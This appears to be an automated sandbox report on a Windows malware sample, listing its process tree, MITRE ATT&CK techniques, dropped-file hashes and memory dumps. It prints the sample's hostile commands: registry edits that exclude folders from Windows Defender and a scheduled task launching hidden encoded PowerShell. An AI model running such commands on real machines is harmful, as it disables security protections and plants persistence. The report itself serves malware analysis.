"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IwGFDhhTU" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MLrIJeslOBZU2" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1888

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MLrIJeslOBZU2" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1256

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dMFexHHRtytWC" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dMFexHHRtytWC" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1604

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:544

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tmuWEvHsDLUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1744

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tmuWEvHsDLUn" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1100

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LtFzXrdCXcavHaVB" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1864

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LtFzXrdCXcavHaVB" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:756

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IwGFDhhTU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IwGFDhhTU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MLrIJeslOBZU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MLrIJeslOBZU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dMFexHHRtytWC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dMFexHHRtytWC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1652

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1372

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tmuWEvHsDLUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1196

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tmuWEvHsDLUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1976

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LtFzXrdCXcavHaVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1824

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LtFzXrdCXcavHaVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1452

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1328

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1764

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1756

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1492

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gVBXnerAb" /SC once /ST 05:20:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1432

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gVBXnerAb"
3⤵
PID:1888

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1044

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1720

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-14601317011368395538537885274-9875682-2777964111736121813-14772955161608451705"
1⤵
- Windows security bypass
PID:1744

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1344768050-1332265817-932819812-13349878-53498190914880177241704484094-843768424"
1⤵
- Windows security bypass
PID:756

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "75724427-21364794591029620869-2008851005436092812-16757459052116112080616297435"
1⤵
- Windows security bypass
PID:1156

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zSE9C4.tmp\Install.exe
Filesize
6.3MB

MD5
1fe3776c2962a9414aef72592237fe23

SHA1
b0d05796799fd8db0608aea0daf0a84f31737830

SHA256
d59b351618d2fd8d8ce03961d05e3169a41bff842b4bd985cc4704059cf7ea7a

SHA512
0827a9897b4f909f440dc9fe8aa722efd4a15f9fe6298b0a1f995da0220140139ccdabb939d06c50b6ee91321c768e17f5fb344d38ffb564172f7576f6d128d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSE9C4.tmp\Install.exe
Filesize
6.3MB

MD5
1fe3776c2962a9414aef72592237fe23

SHA1
b0d05796799fd8db0608aea0daf0a84f31737830

SHA256
d59b351618d2fd8d8ce03961d05e3169a41bff842b4bd985cc4704059cf7ea7a

SHA512
0827a9897b4f909f440dc9fe8aa722efd4a15f9fe6298b0a1f995da0220140139ccdabb939d06c50b6ee91321c768e17f5fb344d38ffb564172f7576f6d128d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSEED2.tmp\Install.exe
Filesize
6.9MB

MD5
a7245804003451aee39fdbd960844977

SHA1
f0a93c6dcb6bea7d00df2e75ee11be8a58460508

SHA256
6dfe82463eb70e7c8402b6a009d971c7ca26fb7fa7490c193c637c138fb216f9

SHA512
81870cce4d551cb5eb6cd53e60fa083a077008758d4037a2e669076f957825225d80d62ff65a0f21c0c8fa80ee511488ba196934ca09d77a7ee61238e7fefaba

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSEED2.tmp\Install.exe
Filesize
6.9MB

MD5
a7245804003451aee39fdbd960844977

SHA1
f0a93c6dcb6bea7d00df2e75ee11be8a58460508

SHA256
6dfe82463eb70e7c8402b6a009d971c7ca26fb7fa7490c193c637c138fb216f9

SHA512
81870cce4d551cb5eb6cd53e60fa083a077008758d4037a2e669076f957825225d80d62ff65a0f21c0c8fa80ee511488ba196934ca09d77a7ee61238e7fefaba

Download Submit
C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\bpisjHu.exe
Filesize
6.9MB

MD5
a7245804003451aee39fdbd960844977

SHA1
f0a93c6dcb6bea7d00df2e75ee11be8a58460508

SHA256
6dfe82463eb70e7c8402b6a009d971c7ca26fb7fa7490c193c637c138fb216f9

SHA512
81870cce4d551cb5eb6cd53e60fa083a077008758d4037a2e669076f957825225d80d62ff65a0f21c0c8fa80ee511488ba196934ca09d77a7ee61238e7fefaba

Download Submit
C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\bpisjHu.exe
Filesize
6.9MB

MD5
a7245804003451aee39fdbd960844977

SHA1
f0a93c6dcb6bea7d00df2e75ee11be8a58460508

SHA256
6dfe82463eb70e7c8402b6a009d971c7ca26fb7fa7490c193c637c138fb216f9

SHA512
81870cce4d551cb5eb6cd53e60fa083a077008758d4037a2e669076f957825225d80d62ff65a0f21c0c8fa80ee511488ba196934ca09d77a7ee61238e7fefaba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
39ddb9be314923aa14965bca969639cf

SHA1
ac7ed50238a0b75fa01ccb98750eeabde172098e

SHA256
65d846c8571035b2f4debe8d698a28c7da33b79df361f8d9df8958e5f908a9fc

SHA512
5a02187f8a789837e630e099560de5733779d50fe3f08b3ca26070343913e3e5a271ec391b0350dba671d44c610dccd9b29724a32c25b734cbd23e6f51b95ac2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
c3c7ddfe70895243e9cf754464c3ff7e

SHA1
8b602812bb6d84b2f367cd99fa3ba53a3e1a38bb

SHA256
83d21d76e4bd08259a156fab40e61c272ef20d83a7e68ab5a2a469345b355a43

SHA512
8d6ef0622ac9e33b7decd313854472fed341bf15d3aa5fd91965c395b0a0a61650b321d54bca93b1ec2f2ccda552909c41940f8575e6c03e12198a6c1e573a23

Download Submit
C:\Windows\Temp\KgqoRVUGdWyiycxE\ojrmovpe\cbqmByRxaocLcUyp.wsf
Filesize
8KB

MD5
728119de13962e4884547efd1477f3ac

SHA1
24fb3790fc3169a718cd85e606482814c5778450

SHA256
4c3a9f197692ddf3cde4d8c6ce66707f5025b65737c64cb8afd7858bc1db9831

SHA512
c6049af8bab8e3e8fb77ce4edcd3c90e4f5d3724fcef0e4191a105db9e10702523210e7da0816752d56798fa36febcd0682529068357aa0f8f74599c2e5f14a9

Download Submit
C:\Windows\system32\GroupPolicy\gpt.ini
Filesize
268B

MD5
a62ce44a33f1c05fc2d340ea0ca118a4

SHA1
1f03eb4716015528f3de7f7674532c1345b2717d

SHA256
9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

SHA512
9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

Download Submit
\Users\Admin\AppData\Local\Temp\7zSE9C4.tmp\Install.exe
Filesize
6.3MB

MD5
1fe3776c2962a9414aef72592237fe23

SHA1
b0d05796799fd8db0608aea0daf0a84f31737830

SHA256
d59b351618d2fd8d8ce03961d05e3169a41bff842b4bd985cc4704059cf7ea7a

SHA512
0827a9897b4f909f440dc9fe8aa722efd4a15f9fe6298b0a1f995da0220140139ccdabb939d06c50b6ee91321c768e17f5fb344d38ffb564172f7576f6d128d0

Download Submit
\Users\Admin\AppData\Local\Temp\7zSE9C4.tmp\Install.exe
Filesize
6.3MB

MD5
1fe3776c2962a9414aef72592237fe23

SHA1
b0d05796799fd8db0608aea0daf0a84f31737830

SHA256
d59b351618d2fd8d8ce03961d05e3169a41bff842b4bd985cc4704059cf7ea7a

SHA512
0827a9897b4f909f440dc9fe8aa722efd4a15f9fe6298b0a1f995da0220140139ccdabb939d06c50b6ee91321c768e17f5fb344d38ffb564172f7576f6d128d0

Download Submit
\Users\Admin\AppData\Local\Temp\7zSE9C4.tmp\Install.exe
Filesize
6.3MB

MD5
1fe3776c2962a9414aef72592237fe23

SHA1
b0d05796799fd8db0608aea0daf0a84f31737830

SHA256
d59b351618d2fd8d8ce03961d05e3169a41bff842b4bd985cc4704059cf7ea7a

SHA512
0827a9897b4f909f440dc9fe8aa722efd4a15f9fe6298b0a1f995da0220140139ccdabb939d06c50b6ee91321c768e17f5fb344d38ffb564172f7576f6d128d0

Download Submit
\Users\Admin\AppData\Local\Temp\7zSE9C4.tmp\Install.exe
Filesize
6.3MB

MD5
1fe3776c2962a9414aef72592237fe23

SHA1
b0d05796799fd8db0608aea0daf0a84f31737830

SHA256
d59b351618d2fd8d8ce03961d05e3169a41bff842b4bd985cc4704059cf7ea7a

SHA512
0827a9897b4f909f440dc9fe8aa722efd4a15f9fe6298b0a1f995da0220140139ccdabb939d06c50b6ee91321c768e17f5fb344d38ffb564172f7576f6d128d0

Download Submit
\Users\Admin\AppData\Local\Temp\7zSEED2.tmp\Install.exe
Filesize
6.9MB

MD5
a7245804003451aee39fdbd960844977

SHA1
f0a93c6dcb6bea7d00df2e75ee11be8a58460508

SHA256
6dfe82463eb70e7c8402b6a009d971c7ca26fb7fa7490c193c637c138fb216f9

SHA512
81870cce4d551cb5eb6cd53e60fa083a077008758d4037a2e669076f957825225d80d62ff65a0f21c0c8fa80ee511488ba196934ca09d77a7ee61238e7fefaba

Download Submit
\Users\Admin\AppData\Local\Temp\7zSEED2.tmp\Install.exe
Filesize
6.9MB

MD5
a7245804003451aee39fdbd960844977

SHA1
f0a93c6dcb6bea7d00df2e75ee11be8a58460508

SHA256
6dfe82463eb70e7c8402b6a009d971c7ca26fb7fa7490c193c637c138fb216f9

SHA512
81870cce4d551cb5eb6cd53e60fa083a077008758d4037a2e669076f957825225d80d62ff65a0f21c0c8fa80ee511488ba196934ca09d77a7ee61238e7fefaba

Download Submit
\Users\Admin\AppData\Local\Temp\7zSEED2.tmp\Install.exe
Filesize
6.9MB

MD5
a7245804003451aee39fdbd960844977

SHA1
f0a93c6dcb6bea7d00df2e75ee11be8a58460508

SHA256
6dfe82463eb70e7c8402b6a009d971c7ca26fb7fa7490c193c637c138fb216f9

SHA512
81870cce4d551cb5eb6cd53e60fa083a077008758d4037a2e669076f957825225d80d62ff65a0f21c0c8fa80ee511488ba196934ca09d77a7ee61238e7fefaba

Download Submit
\Users\Admin\AppData\Local\Temp\7zSEED2.tmp\Install.exe
Filesize
6.9MB

MD5
a7245804003451aee39fdbd960844977

SHA1
f0a93c6dcb6bea7d00df2e75ee11be8a58460508

SHA256
6dfe82463eb70e7c8402b6a009d971c7ca26fb7fa7490c193c637c138fb216f9

SHA512
81870cce4d551cb5eb6cd53e60fa083a077008758d4037a2e669076f957825225d80d62ff65a0f21c0c8fa80ee511488ba196934ca09d77a7ee61238e7fefaba

Download Submit
memory/432-156-0x0000000000000000-mapping.dmp

Download
memory/520-130-0x0000000000000000-mapping.dmp

Download
memory/536-177-0x0000000000000000-mapping.dmp

Download
memory/544-163-0x0000000000000000-mapping.dmp

Download
memory/564-96-0x000007FEF4800000-0x000007FEF5223000-memory.dmp

Filesize
10.1MB

Download
memory/564-102-0x000000000203B000-0x000000000205A000-memory.dmp

Filesize
124KB

Download
memory/564-94-0x0000000000000000-mapping.dmp

Download
memory/564-95-0x000007FEFC621000-0x000007FEFC623000-memory.dmp

Filesize
8KB

Download
memory/564-97-0x000007FEF3CA0000-0x000007FEF47FD000-memory.dmp

Filesize
11.4MB

Download
memory/564-98-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

Filesize
3.0MB

Download
memory/564-99-0x0000000002034000-0x0000000002037000-memory.dmp

Filesize
12KB

Download
memory/564-100-0x000000000203B000-0x000000000205A000-memory.dmp

Filesize
124KB

Download
memory/564-146-0x0000000000000000-mapping.dmp

Download
memory/612-64-0x0000000000000000-mapping.dmp

Download
memory/612-71-0x0000000010000000-0x000000001088D000-memory.dmp

Filesize
8.6MB

Download
memory/636-133-0x0000000000000000-mapping.dmp

Download
memory/676-160-0x0000000000000000-mapping.dmp

Download
memory/684-115-0x0000000000000000-mapping.dmp

Download
memory/684-76-0x0000000000000000-mapping.dmp

Download
memory/684-176-0x0000000000000000-mapping.dmp

Download
memory/692-150-0x0000000000000000-mapping.dmp

Download
memory/756-168-0x0000000000000000-mapping.dmp

Download
memory/832-139-0x000007FEF3CA0000-0x000007FEF47FD000-memory.dmp

Filesize
11.4MB

Download
memory/832-134-0x0000000000000000-mapping.dmp

Download
memory/832-142-0x000000000243B000-0x000000000245A000-memory.dmp

Filesize
124KB

Download
memory/832-141-0x0000000002434000-0x0000000002437000-memory.dmp

Filesize
12KB

Download
memory/832-138-0x0000000002434000-0x0000000002437000-memory.dmp

Filesize
12KB

Download
memory/832-137-0x000007FEF4800000-0x000007FEF5223000-memory.dmp

Filesize
10.1MB

Download
memory/912-132-0x0000000000000000-mapping.dmp

Download
memory/912-105-0x0000000000000000-mapping.dmp

Download
memory/912-157-0x0000000000000000-mapping.dmp

Download
memory/956-144-0x0000000000000000-mapping.dmp

Download
memory/968-175-0x0000000000000000-mapping.dmp

Download
memory/996-74-0x0000000000000000-mapping.dmp

Download
memory/1004-127-0x0000000000000000-mapping.dmp

Download
memory/1012-147-0x0000000000000000-mapping.dmp

Download
memory/1044-167-0x0000000000000000-mapping.dmp

Download
memory/1100-165-0x0000000000000000-mapping.dmp

Download
memory/1152-81-0x0000000000000000-mapping.dmp

Download
memory/1156-129-0x0000000000000000-mapping.dmp

Download
memory/1156-170-0x0000000000000000-mapping.dmp

Download
memory/1168-131-0x0000000000000000-mapping.dmp

Download
memory/1196-143-0x0000000000000000-mapping.dmp

Download
memory/1256-159-0x0000000000000000-mapping.dmp

Download
memory/1260-77-0x0000000000000000-mapping.dmp

Download
memory/1276-174-0x0000000000000000-mapping.dmp

Download
memory/1328-151-0x0000000000000000-mapping.dmp

Download
memory/1328-101-0x0000000000000000-mapping.dmp

Download
memory/1348-103-0x0000000000000000-mapping.dmp

Download
memory/1472-149-0x0000000000000000-mapping.dmp

Download
memory/1524-148-0x0000000000000000-mapping.dmp

Download
memory/1604-161-0x0000000000000000-mapping.dmp

Download
memory/1616-153-0x0000000000000000-mapping.dmp

Download
memory/1620-80-0x0000000000000000-mapping.dmp

Download
memory/1652-178-0x0000000000000000-mapping.dmp

Download
memory/1680-90-0x0000000000000000-mapping.dmp

Download
memory/1680-162-0x0000000000000000-mapping.dmp

Download
memory/1692-116-0x0000000000000000-mapping.dmp

Download
memory/1700-128-0x0000000000000000-mapping.dmp

Download
memory/1728-86-0x0000000000000000-mapping.dmp

Download
memory/1732-84-0x0000000000000000-mapping.dmp

Download
memory/1744-164-0x0000000000000000-mapping.dmp

Download
memory/1752-173-0x0000000000000000-mapping.dmp

Download
memory/1764-152-0x0000000000000000-mapping.dmp

Download
memory/1792-169-0x0000000000000000-mapping.dmp

Download
memory/1812-88-0x0000000000000000-mapping.dmp

Download
memory/1816-108-0x0000000000000000-mapping.dmp

Download
memory/1864-166-0x0000000000000000-mapping.dmp

Download
memory/1888-158-0x0000000000000000-mapping.dmp

Download
memory/1896-54-0x0000000076181000-0x0000000076183000-memory.dmp

Filesize
8KB

Download
memory/1912-145-0x0000000000000000-mapping.dmp

Download
memory/1924-140-0x0000000000000000-mapping.dmp

Download
memory/1928-92-0x0000000000000000-mapping.dmp

Download
memory/1932-124-0x0000000000000000-mapping.dmp

Download
memory/2000-171-0x0000000000000000-mapping.dmp

Download
memory/2016-117-0x0000000000000000-mapping.dmp

Download
memory/2016-120-0x000007FEF4730000-0x000007FEF5153000-memory.dmp

Filesize
10.1MB

Download
memory/2016-121-0x000007FEF3BD0000-0x000007FEF472D000-memory.dmp

Filesize
11.4MB

Download
memory/2016-122-0x0000000002944000-0x0000000002947000-memory.dmp

Filesize
12KB

Download
memory/2016-123-0x000000001B750000-0x000000001BA4F000-memory.dmp

Filesize
3.0MB

Download
memory/2016-125-0x0000000002944000-0x0000000002947000-memory.dmp

Filesize
12KB

Download
memory/2016-126-0x000000000294B000-0x000000000296A000-memory.dmp

Filesize
124KB

Download
memory/2020-56-0x0000000000000000-mapping.dmp

Download
memory/2036-172-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads